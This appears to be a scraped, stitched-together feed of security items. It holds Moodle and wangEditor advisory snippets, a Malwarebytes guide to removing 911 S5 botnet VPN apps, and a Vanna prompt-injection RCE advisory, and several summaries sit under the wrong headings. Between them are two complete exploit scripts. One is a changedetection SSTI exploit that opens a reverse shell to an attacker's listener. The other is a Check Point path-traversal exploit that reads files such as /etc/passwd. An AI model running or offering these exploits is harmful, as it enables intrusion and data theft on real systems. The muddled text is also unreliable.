ID numbers displayed in the lesson overview report required additional sanitizing to prevent a stored XSS risk.

**Moodle Cross-site Scripting (XSS)**

Moderate severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 4, 2024

GHSA-8qwh-4vwv-7c5m: Moodle Cross-site Scripting (XSS)

Incorrect validation of allowed event types in a calendar web service made it possible for some users to create events with types/audiences they did not have permission to publish to.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-33996

**Moodle broken access control when setting calendar event type**

Moderate severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 4, 2024

**Package**

composer moodle/moodle (Composer)

**Affected versions**

\>= 4.3.0, < 4.3.4

\>= 4.2.0, < 4.2.7

< 4.1.10

**Patched versions**

4.3.4

4.2.7

4.1.10

**Description**

Published to the GitHub Advisory Database

May 31, 2024

GHSA-4qww-rxq6-x7gf: Moodle broken access control when setting calendar event type

Additional sanitizing was required when opening the equation editor to prevent a stored Cross-site Scripting (XSS) risk when editing another user's equation.

**Moodle stored Cross-site Scripting (XSS)**

Moderate severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 4, 2024

GHSA-9qgq-93c7-9hm4: Moodle stored Cross-site Scripting (XSS)

Insufficient escaping of participants' names in the participants page table resulted in a stored XSS risk when interacting with some features.

GHSA-xqhh-253w-4q5f: Moodle Cross-site Scripting (XSS)

There is a cross-site scripting (XSS) issue in wanEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-25037

**wanEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function**

Moderate severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 2, 2024

**Package**

npm @wangeditor/editor (npm)

**Affected versions**

<= 4.7.11

**Description**

Published to the GitHub Advisory Database

May 31, 2024

GHSA-9hfw-cvf4-5x25: wanEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function

This post will help users find out if their Windows device has been added to the 911 S5 botnet by a malicious VPN application

On May 29, 2024, the US Department of Justice (DOJ) announced it had dismantled what was likely the world’s largest botnet ever. This botnet, called “911 S5,” infected systems at over 19 million IP addresses across more than 190 countries. The main sources of income for the operators, who stole a billions of dollars across a decade, came from committing pandemic and unemployment fraud, and by selling access to child exploitation materials.

The botnet operator generated millions of dollars by offering cybercriminals access to these infected IP addresses. As part of this operation, a Chinese national, YunHe Wang, was arrested. Wang is reportedly the proprietor of the popular service.

Of the infected Windows devices, 613,841 IP addresses were located in the United States. The DOJ also called the botnet a residential proxy service. Residential proxy networks allow someone in control to rent out a residential IP address which then can be used as a relay for their internet communications. This allows them to hide their true location behind the residential proxy. Cybercriminals used this service to engage in cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.

To set up this botnet, Wang and his associates provided users with free, illegitimate VPN applications that were created to connect to the 911 S5 service. Unaware of the proxy backdoor, once users downloaded and installed these VPN applications, they unknowingly became part of the 911 S5 botnet.

Sometimes the VPN applications were bundled with games and other software and installed without user consent.

For this reason, the FBI has published a public service announcement (PSA) to help users find out if they have been affected by this botnet.

Users can start by going over this list of malicious VPN applications associated with the 911 S5 botnet:

*   MaskVPN
*   DewVPN
*   PaladinVPN
*   ProxyGate
*   ShieldVPN
*   ShineVPN

If you have one of these VPN applications installed, sometimes you can find an uninstaller located under the Start menu option of the VPN application. If present, you can use that uninstall option.

If the application doesn’t present you with an uninstall option, then follow the steps below to attempt to uninstall the application:

*   Click on the Start menu (Windows button) and type “Add or remove programs” to bring up the “Add and Remove Programs” menu.
*   Search for the name of the malicious VPN application.
*   Once you find the application in the list, click on the application name, and select the “Uninstall” option.

Once you have uninstalled the application, you will want to make sure it’s no longer active. To do that, open the Windows Task manager. Press Control+Alt+Delete on the keyboard and select the “Task Manager” option or right-click on the Start menu (Windows button) and select the “Task Manager” option.

In Task Manager look under the “Process” tab for the following processes:

*   MaskVPN (mask\_svc.exe)
*   DewVPN (dew\_svc.exe)
*   PaladinVPN (pldsvc.exe)
*   ProxyGate (proxygate.exe, cloud.exe)
*   ShieldVPN (shieldsvc.exe)
*   ShineVPN (shsvc.exe)

_Example by FBI showing processes associated with ShieldVPN in Task Manager_

If found, select the service related to one of the identified malicious software applications running in the process tab and select the option “End task” to attempt to stop the process from running.

Or, download Malwarebytes Premium (there is a free trial) and run a scan.

Whether you’re using the free or paid version of the app, you can manually run a scan to check for threats on your device. 

1.  Open the app.
2.  On the main dashboard, click the **Scan** button.
3.  A progress page appears while the scan runs.
4.  After the scan finishes, it displays the Threat scan summary.
    *   **If the scan detected no threats:** Click **Done**.
    *   **If the scan detected threats on your device:** Review the threats found on your computer. From here, you can manually quarantine threats by selecting a detection and clicking **Quarantine**.
5.  Click **View Report** or **View Scan Report** to see a history of prior scans. After viewing the threat report, close the scanner window.

If neither of these options, including the Malwarebytes scan, resolve the problem, the FBI has more elaborate instructions. You can also contact the Malwarebytes Support team to assist you.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 How to tell if a VPN app added your Windows device to a botnet 

changedetection versions 0.45.20 and below suffer from a remote code execution vulnerability.

    # Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)# Date: 5-26-2024# Exploit Author: Zach Crosman (zcrosman)# Vendor Homepage: changedetection.io# Software Link: https://github.com/dgtlmoon/changedetection.io# Version: <= 0.45.20# Tested on: Linux# CVE : CVE-2024-32651from pwn import *import requestsfrom bs4 import BeautifulSoupimport argparsedef start_listener(port):    listener = listen(port)    print(f"Listening on port {port}...")    conn = listener.wait_for_connection()    print("Connection received!")    context.newline = b'\r\n'    # Switch to interactive mode    conn.interactive()def add_detection(url, listen_ip, listen_port, notification_url=''):    session = requests.Session()        # First request to get CSRF token    request1_headers = {        "Cache-Control": "max-age=0",        "Upgrade-Insecure-Requests": "1",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    response = session.get(url, headers=request1_headers)    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    print(f'Obtained CSRF token: {csrf_token}')    # Second request to submit the form and get the redirect URL    add_url = f"{url}/form/add/quickwatch"    add_url_headers = {  # Define add_url_headers here        "Origin": url,        "Content-Type": "application/x-www-form-urlencoded"    }    add_url_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/baseball",        "tags": '',        "edit_and_watch_submit_button": "Edit > Watch",        "processor": "text_json_diff"    }    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)    # Extract the URL from the Location header    if 'Location' in post_response.headers:        redirect_url = post_response.headers['Location']        print(f'Redirect URL: {redirect_url}')    else:        print('No redirect URL found')        return    # Third request to add the changedetection url with ssti in notification config    save_detection_url = f"{url}{redirect_url}"    save_detection_headers = {  # Define save_detection_headers here        "Referer": redirect_url,        "Cookie": f"session={session.cookies.get('session')}"    }    save_detection_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/all",        "title": '',        "tags": '',        "time_between_check-weeks": '',        "time_between_check-days": '',        "time_between_check-hours": '',        "time_between_check-minutes": '',        "time_between_check-seconds": '30',        "filter_failure_notification_send": 'y',        "fetch_backend": 'system',        "webdriver_delay": '',        "webdriver_js_execute_code": '',        "method": 'GET',        "headers": '',        "body": '',        "notification_urls": notification_url,        "notification_title": '',        "notification_body": f"""        {{% for x in ().__class__.__base__.__subclasses__() %}}        {{% if "warning" in x.__name__ %}}        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}        {{% endif %}}        {{% endfor %}}        """,        "notification_format": 'System default',        "include_filters": '',        "subtractive_selectors": '',        "filter_text_added": 'y',        "filter_text_replaced": 'y',        "filter_text_removed": 'y',        "trigger_text": '',        "ignore_text": '',        "text_should_not_be_present": '',        "extract_text": '',        "save_button": 'Save'    }    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)    print('Final request made.')if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Add detection and start listener')    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')    args = parser.parse_args()    add_detection(args.url, args.ip, args.port, args.notification)    start_listener(args.port)

changedetection 0.45.20 Remote Code Execution

Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

    # Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___    / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \  | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, | | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /   \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/                                                                                                                                                                                                                                                                                                                                                                 Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/    ''')   def exploit(url, path):  url = url + '/clients/MyCRL'  data =   "aCSHELL/../../../../../../../../../../.."+ path  headers = {            'Connection': 'keep-alive',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'  }  s = Session()  req = Request('POST', url, data=data, headers=headers)  prepped = req.prepare()  #del prepped.headers['Content-Type']  resp = s.send(prepped,      verify=False,      timeout=15  )    print(prepped.headers)  print(url)  print(resp.headers)  print(resp.status_code)if __name__ == '__main__':    title()    if(len(sys.argv) < 3):      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))            exit(0)    else:      exploit(sys.argv[1],sys.argv[2])

Check Point Security Gateway Information Disclosure

The Vanna library uses a prompt function to present the user with visualized results, it is possible to alter the prompt using prompt injection and run arbitrary Python code instead of the intended visualization code. Specifically - allowing external input to the library’s “ask” method with "visualize" set to True (default behavior) leads to remote code execution.

**Vanna prompt injection code execution**

High severity GitHub Reviewed Published May 31, 2024 to the GitHub Advisory Database • Updated Jun 4, 2024

GHSA-7735-w2jp-gvg6: Vanna prompt injection code execution

Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil.

Tag

#git